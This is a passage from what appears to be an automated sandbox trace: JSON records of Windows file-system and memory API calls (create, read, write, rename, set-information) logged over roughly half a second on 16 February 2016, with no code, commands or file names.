"filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,619", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,759", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,769", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,799", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,809", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,819", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,829", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,839", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,859", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,869", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,879", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,910", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,920", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,940", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 